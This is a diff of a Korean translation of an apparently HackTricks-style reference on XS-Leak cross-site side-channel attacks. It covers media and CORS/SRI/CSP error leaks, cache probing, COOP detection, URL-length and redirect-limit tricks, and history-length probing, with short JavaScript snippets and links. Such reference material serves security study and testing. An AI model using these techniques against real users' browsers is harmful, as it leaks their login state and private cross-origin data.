+리소스가 **서비스 워커** 캐시에서 **로드되었는지 감지하기 위해 Performance API를 사용할 수 있습니다.\
+이것은 타이밍 공격으로도 수행할 수 있습니다(자세한 내용은 논문을 참조하십시오).
+
+### Cache
+
+- **Inclusion Methods**: Fetch API
+- **Detectable Difference**: Timing
+- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
+- **Summary:** 리소스가 캐시에 저장되었는지 확인할 수 있습니다.
+- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](<https://xsinator.com/testing.html#Cache%20Leak%20(POST)>)
+
+[Performance API](xs-search.md#performance-api)를 사용하여 리소스가 캐시되었는지 확인할 수 있습니다.
+
+### Network Duration
+
+- **Inclusion Methods**: Fetch API
+- **Detectable Difference**: Page Content
+- **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
+- **Summary:** `performance` API에서 요청의 네트워크 지속 시간을 검색할 수 있습니다.
+- **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
+
+## Error Messages Technique
+
+### Media Error
+
+- **Inclusion Methods**: HTML Elements (Video, Audio)
+- **Detectable Difference**: Status Code
+- **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=828265](https://bugs.chromium.org/p/chromium/issues/detail?id=828265)
+- **Summary:** Firefox에서는 교차 출처 요청의 상태 코드를 정확하게 유출할 수 있습니다.
+- **Code Example**: [https://jsbin.com/nejatopusi/1/edit?html,css,js,output](https://jsbin.com/nejatopusi/1/edit?html,css,js,output)
 ```javascript
 // Code saved here in case it dissapear from the link
 // Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
@@ -386,7 +470,7 @@ err.message +
 audioElement.onerror = errHandler
 }
 ```
-`MediaError` 인터페이스의 message 속성은 성공적으로 로드된 리소스를 고유하게 식별하는 독특한 문자열을 제공합니다. 공격자는 이 기능을 이용해 메시지 내용을 관찰함으로써 교차 출처 리소스의 응답 상태를 추론할 수 있습니다.
+`MediaError` 인터페이스의 message 속성은 성공적으로 로드된 리소스를 고유하게 식별하는 독특한 문자열을 제공합니다. 공격자는 이 기능을 악용하여 메시지 내용을 관찰함으로써 교차 출처 리소스의 응답 상태를 추론할 수 있습니다.
 
 ### CORS 오류
 
@@ -396,7 +480,7 @@ audioElement.onerror = errHandler
 - **요약:** 보안 주장(SA)에서 CORS 오류 메시지는 리디렉션된 요청의 전체 URL을 무심코 노출합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
 
-이 기술은 공격자가 **교차 출처 사이트의 리디렉션 목적지를 추출**할 수 있게 해줍니다. 이는 Webkit 기반 브라우저가 CORS 요청을 처리하는 방식을 이용한 것입니다. 구체적으로, **CORS가 활성화된 요청**이 사용자 상태에 따라 리디렉션을 발행하는 대상 사이트에 전송되고 브라우저가 요청을 거부하면, **리디렉션의 대상 URL 전체**가 오류 메시지 내에 노출됩니다. 이 취약점은 리디렉션의 사실을 드러낼 뿐만 아니라 리디렉션의 끝점과 그 안에 포함될 수 있는 **민감한 쿼리 매개변수**를 노출합니다.
+이 기술은 공격자가 **교차 출처 사이트의 리디렉션 목적지를 추출**할 수 있게 해줍니다. 이는 Webkit 기반 브라우저가 CORS 요청을 처리하는 방식을 악용하는 것입니다. 구체적으로, **CORS가 활성화된 요청**이 사용자 상태에 따라 리디렉션을 발행하는 대상 사이트에 전송되고 브라우저가 요청을 거부하면, **리디렉션의 대상 URL 전체**가 오류 메시지 내에 노출됩니다. 이 취약점은 리디렉션의 사실을 드러낼 뿐만 아니라 리디렉션의 끝점과 그 안에 포함될 수 있는 **민감한 쿼리 매개변수**를 노출합니다.
 
 ### SRI 오류
 
@@ -406,7 +490,7 @@ audioElement.onerror = errHandler
 - **요약:** 보안 주장(SA)에서 CORS 오류 메시지는 리디렉션된 요청의 전체 URL을 무심코 노출합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
 
-공격자는 **상세한 오류 메시지**를 이용해 교차 출처 응답의 크기를 추론할 수 있습니다. 이는 Subresource Integrity(SRI) 메커니즘 덕분에 가능하며, SRI는 리소스가 CDNs에서 가져온 경우 변조되지 않았는지 검증하기 위해 무결성 속성을 사용합니다. SRI가 교차 출처 리소스에서 작동하려면 **CORS가 활성화되어야** 하며, 그렇지 않으면 무결성 검사를 받지 않습니다. 보안 주장(SA)에서 CORS 오류 XS-Leak와 마찬가지로, 무결성 속성이 실패한 후 오류 메시지를 캡처할 수 있습니다. 공격자는 **가짜 해시 값**을 무결성 속성에 할당하여 **이 오류를 유발**할 수 있습니다. SA에서 결과 오류 메시지는 요청된 리소스의 콘텐츠 길이를 무심코 드러냅니다. 이 정보 유출은 공격자가 응답 크기의 변화를 식별할 수 있게 하여 정교한 XS-Leak 공격의 길을 열어줍니다.
+공격자는 **상세한 오류 메시지**를 악용하여 교차 출처 응답의 크기를 추론할 수 있습니다. 이는 Subresource Integrity(SRI) 메커니즘 덕분에 가능하며, SRI는 리소스가 CDNs에서 가져온 경우 변조되지 않았는지 검증하기 위해 무결성 속성을 사용합니다. SRI가 교차 출처 리소스에서 작동하려면 **CORS가 활성화되어야** 하며, 그렇지 않으면 무결성 검사를 받지 않습니다. 보안 주장(SA)에서 CORS 오류 XS-Leak와 마찬가지로, 무결성 속성이 실패한 fetch 요청 후 오류 메시지를 캡처할 수 있습니다. 공격자는 **가짜 해시 값**을 무결성 속성에 할당하여 이 오류를 의도적으로 **유발**할 수 있습니다. SA에서 결과 오류 메시지는 요청된 리소스의 콘텐츠 길이를 무심코 드러냅니다. 이 정보 유출은 공격자가 응답 크기의 변화를 식별할 수 있게 하여 정교한 XS-Leak 공격의 길을 열어줍니다.
 
 ### CSP 위반/감지
 
@@ -416,7 +500,7 @@ audioElement.onerror = errHandler
 - **요약:** CSP에서 피해자의 웹사이트만 허용할 경우, 다른 도메인으로 리디렉션을 시도하면 CSP가 감지 가능한 오류를 발생시킵니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
 
-XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리디렉션되었는지 감지할 수 있습니다. 이 유출은 리디렉션을 감지할 수 있을 뿐만 아니라 리디렉션 대상의 도메인도 유출됩니다. 이 공격의 기본 아이디어는 **공격자 사이트에서 대상 도메인을 허용하는 것**입니다. 대상 도메인에 요청이 발행되면 **리디렉션**이 교차 출처 도메인으로 이루어집니다. **CSP는** 이에 대한 접근을 차단하고 **유출 기법으로 사용되는 위반 보고서를 생성합니다**. 브라우저에 따라 **이 보고서는 리디렉션의 대상 위치를 유출할 수 있습니다**.\
+XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리디렉션되었는지 감지할 수 있습니다. 이 유출은 리디렉션을 감지할 수 있을 뿐만 아니라 리디렉션 대상의 도메인도 유출됩니다. 이 공격의 기본 아이디어는 **공격자 사이트에서 대상 도메인을 허용하는 것**입니다. 대상 도메인에 요청이 발행되면 **교차 출처 도메인으로 리디렉션**됩니다. **CSP는** 이에 대한 접근을 차단하고 **유출 기법으로 사용되는 위반 보고서를 생성합니다**. 브라우저에 따라 **이 보고서는 리디렉션의 대상 위치를 유출할 수 있습니다**.\
 현대 브라우저는 리디렉션된 URL을 표시하지 않지만, 여전히 교차 출처 리디렉션이 발생했음을 감지할 수 있습니다.
 
 ### 캐시
@@ -424,44 +508,44 @@ XS-Leak는 CSP를 사용하여 교차 출처 사이트가 다른 출처로 리
 - **포함 방법**: 프레임, 팝업
 - **감지 가능한 차이**: 페이지 콘텐츠
 - **자세한 정보**: [https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
-- **요약:** 파일을 캐시에서 지웁니다. 대상 페이지를 열어 파일이 캐시에 있는지 확인합니다.
+- **요약:** 파일을 캐시에서 지웁니다. 대상 페이지를 열고 파일이 캐시에 있는지 확인합니다.
 - **코드 예제:**
 
 브라우저는 모든 웹사이트에 대해 하나의 공유 캐시를 사용할 수 있습니다. 출처에 관계없이 특정 파일이 **요청되었는지** 추론할 수 있습니다.
 
 페이지가 사용자가 로그인한 경우에만 이미지를 로드하는 경우, **리소스를 무효화**하여 **요청을 수행**하고 **잘못된 요청**(예: 너무 긴 referer 헤더 사용)으로 리소스를 로드하려고 시도할 수 있습니다. 리소스 로드가 **오류를 유발하지 않았다면**, 이는 **캐시되었기 때문**입니다.
 
-### CSP 지침
+### CSP 지시문
 
 - **포함 방법**: 프레임
 - **감지 가능한 차이**: 헤더
 - **자세한 정보**: [https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
-- **요약:** CSP 헤더 지침은 CSP iframe 속성을 사용하여 조사할 수 있으며, 정책 세부정보를 드러냅니다.
+- **요약:** CSP 헤더 지시문은 CSP iframe 속성을 사용하여 조사할 수 있으며, 정책 세부정보를 드러냅니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
 
-Google Chrome(GC)의 새로운 기능은 웹 페이지가 iframe 요소에 속성을 설정하여 **콘텐츠 보안 정책(CSP)**를 제안할 수 있게 해주며, 정책 지침은 HTTP 요청과 함께 전송됩니다. 일반적으로, 포함된 콘텐츠는 **HTTP 헤더를 통해 이를 승인해야 하며**, 그렇지 않으면 **오류 페이지가 표시됩니다**. 그러나 iframe이 이미 CSP에 의해 관리되고 새로 제안된 정책이 더 제한적이지 않으면 페이지는 정상적으로 로드됩니다. 이 메커니즘은 공격자가 오류 페이지를 식별하여 교차 출처 페이지의 **특정 CSP 지침을 감지**할 수 있는 경로를 열어줍니다. 이 취약점은 수정된 것으로 표시되었지만, 우리의 발견은 오류 페이지를 감지할 수 있는 **새로운 유출 기법**을 드러내며, 근본적인 문제가 완전히 해결되지 않았음을 시사합니다.
+Google Chrome(GC)의 새로운 기능은 웹 페이지가 iframe 요소에 속성을 설정하여 **콘텐츠 보안 정책(CSP)**를 제안할 수 있게 하며, 정책 지시문은 HTTP 요청과 함께 전송됩니다. 일반적으로, 포함된 콘텐츠는 **HTTP 헤더를 통해 이를 승인해야 하며**, 그렇지 않으면 **오류 페이지가 표시됩니다**. 그러나 iframe이 이미 CSP에 의해 관리되고 새로 제안된 정책이 더 제한적이지 않으면 페이지는 정상적으로 로드됩니다. 이 메커니즘은 공격자가 오류 페이지를 식별하여 교차 출처 페이지의 **특정 CSP 지시문**을 감지할 수 있는 경로를 열어줍니다. 이 취약점은 수정된 것으로 표시되었지만, 우리의 발견은 오류 페이지를 감지할 수 있는 **새로운 유출 기법**을 드러내며, 근본적인 문제가 완전히 해결되지 않았음을 시사합니다.
 
 ### **CORP**
 
 - **포함 방법**: Fetch API
 - **감지 가능한 차이**: 헤더
 - **자세한 정보**: [**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
-- **요약:** 교차 출처 리소스 정책(CORP)으로 보호된 리소스는 허용되지 않는 출처에서 가져올 때 오류를 발생시킵니다.
+- **요약:** 교차 출처 리소스 정책(CORP)으로 보호된 리소스는 허용되지 않은 출처에서 가져올 때 오류를 발생시킵니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
 
-CORP 헤더는 상대적으로 새로운 웹 플랫폼 보안 기능으로, 설정 시 **주어진 리소스에 대한 no-cors 교차 출처 요청을 차단합니다**. 헤더의 존재는 감지할 수 있으며, CORP로 보호된 리소스는 **가져올 때 오류를 발생시킵니다**.
+CORP 헤더는 비교적 새로운 웹 플랫폼 보안 기능으로, 설정되면 **주어진 리소스에 대한 no-cors 교차 출처 요청을 차단합니다**. 헤더의 존재는 감지할 수 있으며, CORP로 보호된 리소스는 **가져올 때 오류를 발생시킵니다**.
 
 ### CORB
 
 - **포함 방법**: HTML 요소
 - **감지 가능한 차이**: 헤더
 - **자세한 정보**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
-- **요약**: CORB는 공격자가 요청에 **`nosniff` 헤더가 존재하는지** 감지할 수 있게 해줍니다.
+- **요약**: CORB는 공격자가 요청에 **`nosniff` 헤더가 존재하는지** 감지할 수 있게 합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
 
 공격에 대한 자세한 정보는 링크를 확인하세요.
 
-### 출처 반영 잘못된 구성에서의 CORS 오류 <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>
+### 출처 반사 잘못 구성으로 인한 CORS 오류 <a href="#cors-error-on-origin-reflection-misconfiguration" id="cors-error-on-origin-reflection-misconfiguration"></a>
 
 - **포함 방법**: Fetch API
 - **감지 가능한 차이**: 헤더
@@ -469,7 +553,7 @@ CORP 헤더는 상대적으로 새로운 웹 플랫폼 보안 기능으로, 설
 - **요약**: Origin 헤더가 `Access-Control-Allow-Origin` 헤더에 반영되면 리소스가 이미 캐시에 있는지 확인할 수 있습니다.
 - **코드 예제**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
 
-**Origin 헤더**가 `Access-Control-Allow-Origin` 헤더에 **반영**되는 경우, 공격자는 이 동작을 악용하여 **CORS** 모드에서 **리소스를 가져오려고 시도**할 수 있습니다. **오류**가 **발생하지 않으면**, 이는 **웹에서 올바르게 검색되었음을 의미하며**, 오류가 **발생하면**, 이는 **캐시에서 접근되었기 때문**입니다(오류는 캐시가 원래 도메인을 허용하는 CORS 헤더가 있는 응답을 저장하기 때문에 발생합니다).\
+**Origin 헤더**가 `Access-Control-Allow-Origin` 헤더에 **반영**되고 있다면, 공격자는 이 동작을 악용하여 **CORS** 모드에서 **리소스를 가져오려고 시도할 수 있습니다**. **오류**가 **발생하지 않으면**, 이는 **웹에서 올바르게 검색되었음을 의미하며**, 오류가 **발생하면**, 이는 **캐시에서 접근되었기 때문입니다**(오류는 캐시가 원래 도메인을 허용하는 CORS 헤더가 있는 응답을 저장하기 때문에 발생합니다).\
 Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Control-Allow-Origin: *`), 이는 작동하지 않습니다.
 
 ## 읽을 수 있는 속성 기술
@@ -482,7 +566,7 @@ Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Con
 - **요약:** GC와 SA는 리디렉션이 완료된 후 응답의 유형(opaque-redirect)을 확인할 수 있습니다.
 - **코드 예제**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
 
-`redirect: "manual"` 및 기타 매개변수를 사용하여 Fetch API를 통해 요청을 제출하면, `response.type` 속성을 읽을 수 있으며, 이 값이 `opaqueredirect`와 같으면 응답이 리디렉션이었습니다.
+`redirect: "manual"` 및 기타 매개변수를 사용하여 Fetch API를 통해 요청을 제출하면, `response.type` 속성을 읽을 수 있으며, 이 값이 `opaqueredirect`와 같으면 응답이 리디렉션된 것입니다.
 
 ### COOP
 
@@ -492,38 +576,38 @@ Origin이 반영되지 않고 와일드카드가 사용되는 경우(`Access-Con
 - **요약:** 교차 출처 오프너 정책(COOP)으로 보호된 페이지는 교차 출처 상호작용으로부터의 접근을 차단합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
 
-공격자는 교차 출처 HTTP 응답에서 교차 출처 오프너 정책(COOP) 헤더의 존재를 추론할 수 있습니다. COOP는 웹 애플리케이션이 외부 사이트가 임의의 창 참조를 얻지 못하도록 방지하는 데 사용됩니다. 이 헤더의 가시성은 **`contentWindow` 참조에 접근하려고 시도함으로써 감지할 수 있습니다**. COOP가 조건부로 적용되는 경우, **`opener` 속성**은 결정적인 지표가 됩니다: COOP가 활성화되면 **정의되지 않으며**, 비활성화되면 **정의됩니다**.
+공격자는 교차 출처 HTTP 응답에서 교차 출처 오프너 정책(COOP) 헤더의 존재를 추론할 수 있습니다. COOP는 웹 애플리케이션이 외부 사이트가 임의의 창 참조를 얻지 못하도록 방지하는 데 사용됩니다. 이 헤더의 가시성은 **`contentWindow` 참조**에 접근하려고 시도함으로써 감지할 수 있습니다. COOP가 조건부로 적용되는 경우, **`opener` 속성**은 결정적인 지표가 됩니다: COOP가 활성화되면 **정의되지 않으며**, 그렇지 않으면 **정의됩니다**.
 
 ### URL 최대 길이 - 서버 측
 
 - **포함 방법**: Fetch API, HTML 요소
 - **감지 가능한 차이**: 상태 코드 / 콘텐츠
 - **자세한 정보**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
-- **요약:** 리디렉션 응답 길이로 인해 응답의 차이를 감지할 수 있습니다. 길이가 너무 커서 서버가 오류로 응답하고 경고가 생성됩니다.
+- **요약:** 리디렉션 응답 길이로 인해 응답의 차이를 감지할 수 있습니다. 너무 길면 서버가 오류로 응답하고 경고가 생성됩니다.
 - **코드 예제**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
 
 서버 측 리디렉션이 **리디렉션 내에서 사용자 입력을 사용하고** **추가 데이터**를 포함하는 경우, 이 동작을 감지할 수 있습니다. 일반적으로 **서버**는 **요청 길이 제한**이 있습니다. **사용자 데이터**가 **길이 - 1**인 경우, **리디렉션**이 **해당 데이터**를 사용하고 **추가**하는 경우, **오류가 발생하여 오류 이벤트를 통해 감지할 수 있습니다**.
 
-사용자에게 쿠키를 설정할 수 있는 경우, **충분한 쿠키를 설정하여** 이 공격을 수행할 수도 있습니다([**쿠키 폭탄**](hacking-with-cookies/cookie-bomb.md)). 이 경우, **정상 응답의 크기 증가**로 인해 **오류**가 발생합니다. 이 요청을 동일한 사이트에서 트리거하면 `<script>`가 자동으로 쿠키를 전송하므로 **오류를 확인할 수 있습니다**.\
-**쿠키 폭탄 + XS-Search**의 예시는 이 문서의 의도된 솔루션에서 찾을 수 있습니다: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
+사용자에게 쿠키를 설정할 수 있는 경우, **충분한 쿠키를 설정하여** 이 공격을 수행할 수도 있습니다 ([**쿠키 폭탄**](hacking-with-cookies/cookie-bomb.md)). 이 경우, **정상 응답의 크기 증가**로 인해 **오류**가 발생합니다. 이 요청을 동일한 사이트에서 트리거하면 `<script>`가 자동으로 쿠키를 전송하므로 **오류를 확인할 수 있습니다**.\
+**쿠키 폭탄 + XS-Search**의 예는 이 문서의 의도된 솔루션에서 찾을 수 있습니다: [https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
 
-`SameSite=None` 또는 동일한 컨텍스트에 있어야 이 유형의 공격이 일반적으로 필요합니다.
+이 유형의 공격에는 `SameSite=None` 또는 동일한 컨텍스트에 있어야 합니다.
 
 ### URL 최대 길이 - 클라이언트 측
 
 - **포함 방법**: 팝업
 - **감지 가능한 차이**: 상태 코드 / 콘텐츠
 - **자세한 정보**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
-- **요약:** 리디렉션 응답 길이로 인해 응답의 차이를 감지할 수 있습니다. 요청이 너무 커서 차이를 감지할 수 있습니다.
+- **요약:** 리디렉션 응답 길이로 인해 응답의 차이를 감지할 수 있습니다. 요청이 너무 길면 차이를 감지할 수 있습니다.
 - **코드 예제**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
 
 [Chromium 문서](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url_display_guidelines/url_display_guidelines.md#URL-Length)에 따르면, Chrome의 최대 URL 길이는 2MB입니다.
 
-> 일반적으로, _웹 플랫폼_은 URL 길이에 대한 제한이 없습니다(2^31이 일반적인 제한입니다). _Chrome_은 실용적인 이유로 최대 **2MB**로 URL 길이를 제한하며, 프로세스 간 통신에서 서비스 거부 문제를 피하기 위해서입니다.
+> 일반적으로, _웹 플랫폼_은 URL 길이에 대한 제한이 없습니다(2^31이 일반적인 제한이지만). _Chrome_은 실용적인 이유로 URL을 최대 **2MB**로 제한하여 프로세스 간 통신에서 서비스 거부 문제를 피합니다.
 
-따라서 **리디렉션 URL의 응답이 한 경우보다 더 크면**, **2MB보다 큰 URL로 리디렉션**하여 **길이 제한**에 도달할 수 있습니다. 이 경우, Chrome은 **`about:blank#blocked`** 페이지를 표시합니다.
+따라서 **리디렉션 URL이 한 경우에 더 큰 응답을 반환하면**, **2MB보다 큰 URL로 리디렉션**하여 **길이 제한**에 도달할 수 있습니다. 이 경우, Chrome은 **`about:blank#blocked`** 페이지를 표시합니다.
 
-**눈에 띄는 차이점**은 **리디렉션**이 **완료되었을 경우**, `window.origin`이 **오류를 발생시키는** 것입니다. 교차 출처는 해당 정보를 접근할 수 없습니다. 그러나 **제한**이 **초과**되고 로드된 페이지가 **`about:blank#blocked`**인 경우, 창의 **`origin`**은 **부모**의 것이며, 이는 **접근 가능한 정보**입니다.
+**눈에 띄는 차이점**은 **리디렉션**이 **완료되었을 경우**, `window.origin`이 **오류를 발생시키는 것**입니다. 교차 출처는 해당 정보를 접근할 수 없습니다. 그러나 **제한**이 **초과**되고 로드된 페이지가 **`about:blank#blocked`**인 경우, 창의 **`origin`**은 **부모**의 것이며, 이는 **접근 가능한 정보**입니다.
 
 **2MB**에 도달하기 위해 필요한 모든 추가 정보는 초기 URL에 **해시**를 추가하여 **리디렉션에 사용될 수 있습니다**.
 
@@ -539,7 +623,7 @@ xs-search/url-max-length-client-side.md
 - **요약:** 브라우저의 리디렉션 제한을 사용하여 URL 리디렉션의 발생 여부를 확인합니다.
 - **코드 예제**: [https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
 
-브라우저의 **최대** 리디렉션 수가 **20**인 경우, 공격자는 **19개의 리디렉션**으로 자신의 페이지를 로드하려고 시도하고 마지막으로 **피해자를 테스트된 페이지로 보냅니다**. **오류**가 발생하면, 페이지가 **피해자를 리디렉션하려고 시도한 것입니다**.
+브라우저의 **최대** 리디렉션 수가 **20**인 경우, 공격자는 **19개의 리디렉션**으로 자신의 페이지를 로드하려고 시도하고 마지막에 **피해자를 테스트된 페이지로 보냅니다**. **오류**가 발생하면, 페이지가 피해자를 **리디렉션하려고 시도한 것입니다**.
 
 ### 히스토리 길이
 
@@ -549,7 +633,7 @@ xs-search/url-max-length-client-side.md
 - **요약:** JavaScript 코드는 브라우저 히스토리를 조작할 수 있으며, 길이 속성으로 접근할 수 있습니다.
 - **코드 예제**: [https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
 
-**History API**는 JavaScript 코드가 브라우저 히스토리를 조작할 수 있게 해주며, 이는 **사용자가 방문한 페이지를 저장합니다**. 공격자는 길이 속성을 포함 방법으로 사용할 수 있습니다: JavaScript 및 HTML 탐색을 감지하기 위해.\
+**History API**는 JavaScript 코드가 브라우저 히스토리를 조작할 수 있게 하며, 이는 **사용자가 방문한 페이지를 저장합니다**. 공격자는 길이 속성을 포함 방법으로 사용할 수 있습니다: JavaScript 및 HTML 탐색을 감지하기 위해.\
 **`history.length`**를 확인하고 사용자가 **페이지로 탐색**하게 한 후, **동일 출처로 다시 변경**하고 **`history.length`**의 새 값을 확인합니다.
 
 ### 동일 URL로 히스토리 길이
@@ -559,7 +643,7 @@ xs-search/url-max-length-client-side.md
 - **요약:** 히스토리 길이를 악용하여 프레임/팝업의 위치가 특정 URL에 있는지 추측할 수 있습니다.
 - **코드 예제**: 아래
 
-공격자는 JavaScript 코드를 사용하여 **프레임/팝업 위치를 추측한 URL로 조작하고** **즉시** **`about:blank`**로 변경할 수 있습니다. 히스토리 길이가 증가하면 URL이 올바르며 **증가할 시간이 있었음을 의미합니다**. 동일한 경우에는 **재로드되지 않기 때문에** 증가하지 않았음을 의미합니다. 추측한 URL을 로드하려고 시도했지만 **즉시 후에** **`about:blank`**를 로드했기 때문에 **히스토리 길이는 증가하지 않았습니다**.
+공격자는 JavaScript 코드를 사용하여 **프레임/팝업 위치를 추측한 URL로 조작하고** **즉시** **`about:blank`**로 변경할 수 있습니다. 히스토리 길이가 증가하면 URL이 올바르며 **URL이 동일할 경우 다시 로드되지 않기 때문에 증가할 시간이 있음을 의미합니다**. 증가하지 않았다면, 이는 **추측한 URL을 로드하려고 시도했지만, 즉시** **`about:blank`**를 로드했기 때문에 **히스토리 길이가 증가하지 않았음을 의미합니다**.
 ```javascript
 async function debug(win, url) {
 win.location = url + "#aaa"
@@ -603,7 +687,7 @@ HTML 요소를 통한 정보 유출은 웹 보안에서 우려되는 문제로,
 ### Information Exposed by HTML Elements
 
 - **HTMLMediaElement**: 이 요소는 미디어의 `duration` 및 `buffered` 시간을 노출하며, API를 통해 접근할 수 있습니다. [HTMLMediaElement에 대해 더 알아보기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
-- **HTMLVideoElement**: `videoHeight` 및 `videoWidth`를 노출합니다. 일부 브라우저에서는 `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, `webkitDecodedFrameCount`와 같은 추가 속성이 제공되어 미디어 콘텐츠에 대한 더 깊이 있는 정보를 제공합니다. [HTMLVideoElement에 대해 더 알아보기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
+- **HTMLVideoElement**: `videoHeight` 및 `videoWidth`를 노출합니다. 일부 브라우저에서는 `webkitVideoDecodedByteCount`, `webkitAudioDecodedByteCount`, `webkitDecodedFrameCount`와 같은 추가 속성이 제공되어 미디어 콘텐츠에 대한 더 깊은 정보를 제공합니다. [HTMLVideoElement에 대해 더 알아보기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
 - **getVideoPlaybackQuality()**: 이 함수는 비디오 재생 품질에 대한 세부 정보를 제공하며, `totalVideoFrames`를 포함하여 처리된 비디오 데이터의 양을 나타낼 수 있습니다. [getVideoPlaybackQuality()에 대해 더 알아보기](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
 - **HTMLImageElement**: 이 요소는 이미지의 `height` 및 `width`를 유출합니다. 그러나 이미지가 유효하지 않은 경우 이러한 속성은 0을 반환하며, `image.decode()` 함수는 거부되어 이미지를 제대로 로드하지 못했음을 나타냅니다. [HTMLImageElement에 대해 더 알아보기](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
 
@@ -616,7 +700,7 @@ HTML 요소를 통한 정보 유출은 웹 보안에서 우려되는 문제로,
 - **Code Example**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
 
 웹 애플리케이션은 사용자의 상태에 따라 **웹사이트 스타일을 변경할 수 있습니다**. 공격자 페이지에 **HTML 링크 요소**를 사용하여 교차 출처 CSS 파일을 삽입할 수 있으며, **규칙**은 공격자 페이지에 **적용됩니다**. 페이지가 이러한 규칙을 동적으로 변경하면 공격자는 사용자 상태에 따라 이러한 **차이**를 **감지**할 수 있습니다.\
-유출 기술로서 공격자는 `window.getComputedStyle` 메서드를 사용하여 특정 HTML 요소의 **CSS** 속성을 **읽을 수 있습니다**. 결과적으로, 공격자는 영향을 받는 요소와 속성 이름이 알려져 있다면 임의의 CSS 속성을 읽을 수 있습니다.
+유출 기술로서 공격자는 `window.getComputedStyle` 메서드를 사용하여 특정 HTML 요소의 **CSS** 속성을 **읽을 수 있습니다**. 결과적으로 영향을 받는 요소와 속성 이름이 알려져 있다면 공격자는 임의의 CSS 속성을 읽을 수 있습니다.
 
 ### CSS History
 
@@ -633,7 +717,7 @@ CSS `:visited` 선택자는 사용자가 이전에 방문한 경우 URL을 다
 
